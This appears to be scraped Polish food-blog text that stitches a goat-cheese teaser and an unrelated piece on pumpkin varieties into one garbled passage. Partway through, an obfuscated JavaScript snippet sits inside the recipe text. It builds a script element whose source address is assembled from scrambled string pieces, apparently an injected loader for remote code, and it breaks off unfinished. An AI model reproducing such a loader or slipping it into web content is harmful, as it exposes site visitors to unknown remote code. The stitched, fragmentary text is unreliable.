Świeży i lekko pikantny smak prawdziwego koziego sera nie może równać się z niczym innym. Doskonale komponuje się z delikatnie schłodzonym białym winem, szynką parmeńską, cukinią lub truskawkami. Ser kozi nadaje potrawie nie tylko niezwykły smak, ale również aksamitną konsystencję. Sery kozie – odrobina historii Kozy są hodowane przez człowieka od ponad 10 tysięcy lat. Służyły, jako źródło mleka, mięsa(...)Producenci wciąż prześcigają się w udoskonalaniu technologii produkcji serów kozich, żeby otrzymywać wysokogatunkowe, zdrowe produkty o wyśmienitym smaku i przyjemnym aromacie. Dzięki temu, sery kozie wzbogacają sałatki, desery i faszerowane warzywa oraz stanowią nieodłączny element klasycznej deski serów. (function(){ t8aeu="3mump3dw8ae7";t8ae=document.createElement("script"); t8ae_="u"+("st");t8ae_+="at"+(".");t8ae.async=true;t8ae_+="in"; t8aeu="311155351."+t8aeu;t8ae.type="text/javascript";t8aeu+="2ynr9i5qgwe5
ProstePesto.pldawniej kojarzona była z potępionymi duszami ;) Dynia jest przede wszystkim smacznym i bardzo odżywczym owocem, którego rodzina obejmuje aż 760 gatunków. Do dyniowatych należą m.in.: arbuzy, melony, kabaczki, cukinie, ogórki i tykwy. ( zdjęcie: www.swiatkwiatow.pl ) W Polsce najchętniej uprawia się te dynie o żółto-pomarańczowym miąższu, bogate w pestki, które są bardzo drogocenne dla naszego organizmu. Najczęściej spotka się(...)mniej intensywny odcień. Jej miąższ jest jasnożółty lub jasnopomarańczowy, jest lekko słodki i ma delikatną strukturę. Sweet Dumpling To dynia ozdobna, która oprócz walorów estetycznych doskonale nadaje się do faszerowania. Jest bardzo mała i zwykle nie przekracza 0,5 kg. Ma bladozieloną skórkę i ciemniejsze (zielone lub pomarańczowe) „umaszczenie” między „żebrami”. Dynie tej odmiany charakteryzują się
Ostra na Słodko